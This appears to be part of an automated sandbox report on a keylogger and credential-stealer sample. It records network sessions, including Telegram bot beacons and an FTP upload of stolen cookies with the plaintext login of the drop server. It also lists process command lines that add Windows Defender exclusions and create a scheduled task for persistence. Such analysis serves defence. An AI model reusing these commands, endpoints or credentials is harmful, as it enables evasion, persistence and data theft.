                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    12 | 192.168.2.4 | 49758 | 188.114.96.34 | 443 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:27 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:27 UTC | 714 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:27 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 8
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xs875S9agr60f5ve1VDggC%2BCDRAK%2F2yERs93wxA0Bw89OAyvxwub25iAIGxtaUgC1iwaCa6AinhYT%2B2Xqo6vGrvxKNT64UpKRMl%2B4%2Bp%2BGVB6c%2BXf%2B%2FCwqlHc85h7Kvb13uMViS3j"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c6baa548c6f-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:27 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.4 | 49761 | 188.114.96.34 | 443 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:28 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:28 UTC | 712 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:28 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 9
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ov29A6nBB1qG8EvlPdLf%2Bvameea%2FDBhzDK2s9qtdT5KTsisrlgZBCbWF%2BA7%2Fj%2BWO7ZCKEcxQ%2BpwORvDja2pejQET3YGpo3mz5vMxan48vU1l5MactXNHBXyYw%2By5ocg3b%2F5rITNJ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c716dbcc470-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:28 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.4 | 49762 | 188.114.96.34 | 443 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:28 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:28 UTC | 702 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:28 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 9
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1s7caMhoiznEbiQE0BGBfzjcRAHgiWnQ1x7ExL3Upk8UrQ6Kt%2BPZfUors4blJZNiPASSKRTmh7eWS6nWSxInqsnPOlkIbvehyEHcmvS2HttKrUU7dxwTskGGQJIehghm%2FDRo%2FIOY"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c73dcd0430d-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:28 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.4 | 49765 | 188.114.96.34 | 443 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:29 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:29 UTC | 709 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:29 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 10
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bhz2tgo34ckvT9jvaHr9jZyaBqtcg%2F3NG638sNoKymwLTvACNQikuBue%2BQmg8Vk39S2S6BZ5%2BMhEI4H4d2Z3d8xESsNuIOYUukT%2ByADP4aTj%2BdLR9ceOr1DYtl1CPuyjUusf8tlB"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c796a574309-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:29 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    16 | 192.168.2.4 | 49766 | 188.114.96.34 | 443 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:29 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:29 UTC699INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:29 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 10
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X9DHG9H0fFDRFG5zmqFwTKJrFqdpiCuOO50DsuZdq7BcabZr6hJNVlCwx3vJE9hWRuMsfwHBIZW6cR%2FOUYDNinbflDjN83ieYatNRCjVx9SnTBtIuIoL84xWnRv52J1bawg2EYnd"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c7c29dcc411-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     17 | 192.168.2.4 | 49767 | 149.154.167.220 | 443 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     2024-10-11 07:35:30 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                     Host: api.telegram.org
                                                     Connection: Keep-Alive
                                                     2024-10-11 07:35:30 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                     Server: nginx/1.18.0
                                                     Date: Fri, 11 Oct 2024 07:35:30 GMT
                                                     Content-Type: application/json
                                                     Content-Length: 55
                                                     Connection: close
                                                     Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                     Access-Control-Allow-Origin: *
                                                     Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                     2024-10-11 07:35:30 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                     Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     18 | 192.168.2.4 | 49770 | 188.114.96.3 | 443 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     2024-10-11 07:35:31 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                     Host: reallyfreegeoip.org
                                                     Connection: Keep-Alive
                                                     2024-10-11 07:35:31 UTC | 701 | IN | HTTP/1.1 200 OK
                                                     Date: Fri, 11 Oct 2024 07:35:31 GMT
                                                     Content-Type: application/xml
                                                     Transfer-Encoding: chunked
                                                     Connection: close
                                                     access-control-allow-origin: *
                                                     vary: Accept-Encoding
                                                     Cache-Control: max-age=86400
                                                     CF-Cache-Status: HIT
                                                     Age: 12
                                                     Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                     Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2cDRZvhueeJXe7LATkMfDon8clK42uWFOZK%2BZkwGbrEk%2FExiuBt1uQ5KK3D03njoGYiD9EGqHHLZZG5MiPWlAj3RcRZ9MKmwC60vWYUmwpoKNcvDdlmb0iwuBofPFvAMUmTiJHk"}],"group":"cf-nel","max_age":604800}
                                                     NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                     Server: cloudflare
                                                     CF-RAY: 8d0d2c85ab897cb2-EWR
                                                     alt-svc: h3=":443"; ma=86400
                                                     2024-10-11 07:35:31 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                     Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                     2024-10-11 07:35:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                     Data Ascii: 0


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     19 | 192.168.2.4 | 49773 | 149.154.167.220 | 443 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     2024-10-11 07:35:32 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                     Host: api.telegram.org
                                                     Connection: Keep-Alive
                                                     2024-10-11 07:35:32 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                     Server: nginx/1.18.0
                                                     Date: Fri, 11 Oct 2024 07:35:32 GMT
                                                     Content-Type: application/json
                                                     Content-Length: 55
                                                     Connection: close
                                                     Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                     Access-Control-Allow-Origin: *
                                                     Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                     2024-10-11 07:35:32 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                     Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                     Oct 11, 2024 09:35:38.569251060 CEST | 21 | 49204 | 185.230.141.85 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                     220-You are user number 6 of 50 allowed.
                                                     220-Local time is now 07:35. Server port: 21.
                                                     220-This is a private system - No anonymous login
                                                     220-IPv6 connections are also welcome on this server.
                                                     220 You will be disconnected after 15 minutes of inactivity.
                                                     Oct 11, 2024 09:35:38.569528103 CEST | 49204 | 21 | 192.168.2.4 | 185.230.141.85 | USER Soma@hulonqgroup.com
                                                     Oct 11, 2024 09:35:38.792526960 CEST | 21 | 49204 | 185.230.141.85 | 192.168.2.4 | 331 User Soma@hulonqgroup.com OK. Password required
                                                     Oct 11, 2024 09:35:38.792690039 CEST | 49204 | 21 | 192.168.2.4 | 185.230.141.85 | PASS TNwhAkO^1&lZ
                                                     Oct 11, 2024 09:35:39.098913908 CEST | 21 | 49204 | 185.230.141.85 | 192.168.2.4 | 230 OK. Current restricted directory is /
                                                     Oct 11, 2024 09:35:39.320677042 CEST | 21 | 49204 | 185.230.141.85 | 192.168.2.4 | 504 Unknown command
                                                     Oct 11, 2024 09:35:39.320897102 CEST | 49204 | 21 | 192.168.2.4 | 185.230.141.85 | PWD
                                                     Oct 11, 2024 09:35:39.653044939 CEST | 21 | 49204 | 185.230.141.85 | 192.168.2.4 | 257 "/" is your current location
                                                     Oct 11, 2024 09:35:39.653198004 CEST | 49204 | 21 | 192.168.2.4 | 185.230.141.85 | TYPE I
                                                     Oct 11, 2024 09:35:39.875978947 CEST | 21 | 49204 | 185.230.141.85 | 192.168.2.4 | 200 TYPE is now 8-bit binary
                                                     Oct 11, 2024 09:35:39.876336098 CEST | 49204 | 21 | 192.168.2.4 | 185.230.141.85 | PASV
                                                     Oct 11, 2024 09:35:40.098352909 CEST | 21 | 49204 | 185.230.141.85 | 192.168.2.4 | 227 Entering Passive Mode (185,230,141,85,194,29)
                                                     Oct 11, 2024 09:35:40.103816032 CEST | 49204 | 21 | 192.168.2.4 | 185.230.141.85 | STOR 301389 - Cookies ID - ZyiAEnXWZP1593367783.txt
                                                     Oct 11, 2024 09:35:40.712950945 CEST | 21 | 49204 | 185.230.141.85 | 192.168.2.4 | 150 Accepted data connection
                                                     Oct 11, 2024 09:35:40.935658932 CEST | 21 | 49204 | 185.230.141.85 | 192.168.2.4 | 226-File successfully transferred
                                                     226 0.222 seconds (measured here), 29.88 Kbytes per second


                                                    Target ID:0
                                                    Start time:03:35:11
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\rShipmentDocuments.exe"
                                                    Imagebase:0xeb0000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
                                                    Imagebase:0x760000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                                                    Imagebase:0x760000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
                                                    Imagebase:0x380000
                                                    File size:187'904 bytes
                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

